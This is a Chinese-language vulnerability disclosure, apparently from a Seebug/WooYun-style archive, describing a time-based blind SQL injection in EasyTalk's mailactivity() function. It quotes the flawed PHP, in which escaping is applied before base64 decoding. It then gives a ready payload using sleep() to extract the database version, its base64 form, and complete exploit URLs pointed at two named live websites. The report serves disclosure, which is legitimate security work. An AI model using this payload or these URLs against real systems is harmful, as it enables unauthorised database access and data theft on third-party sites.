easytalk一处盲注

### 简要描述： easytalk一处盲注 ### 详细说明： 问题出在mailactivity()函数，其过滤daddslashes在base64_decode之前，但是后面没有输出，不过没关系，我们可以盲注 ``` public function mailactivity() { parent::tologin(); $_authmsg=daddslashes($_GET['auth']); $authmsg=base64_decode($_authmsg); //这里反了…… $tem=explode(":",$authmsg); $send_id=$tem[0]; $user=M('Users'); $row = $user->field('auth_email')->where("user_id='$send_id'")->find(); $auth_email=$row['auth_email']; if ($_authmsg==$auth_email) { $user->where("user_id='$send_id'")->setField(array('auth_email'=>1,'regmailauth'=>1)); setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/'); } else { setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/'); } header('location:'.SITE_URL.'/?m=guide'); } ``` 构造： 2' and (select if((ascii(substring((select version()),1,1)) = 53),sleep(5),0))# 进行base64加密： MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHZlcnNpb24oKSksMSwxKSkgPSA1Myksc2xlZXAoNSksMCkpIw== 先登录之后访问： http://t.nextsns.com/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHZlcnNpb24oKSksMSwxKSkgPSA1Myksc2xlZXAoNSksMCkpIw== 这个下面写着X2.4，那么我们找一个X2.5的也一样： http://www.snju.com/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHZlcnNpb24oKSksMSwxKSkgPSA1Myksc2xlZXAoNSksMCkpIw== ### 漏洞证明： http://t.nextsns.com/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHZlcnNpb24oKSksMSwxKSkgPSA1Myksc2xlZXAoNSksMCkpIw== http://www.snju.com/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHZlcnNpb24oKSksMSwxKSkgPSA1Myksc2xlZXAoNSksMCkpIw== [<img src="https://images.seebug.org/upload/201405/092011257ba617e2241615cd2e33ac72cf45ad43.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/092011257ba617e2241615cd2e33ac72cf45ad43.jpg)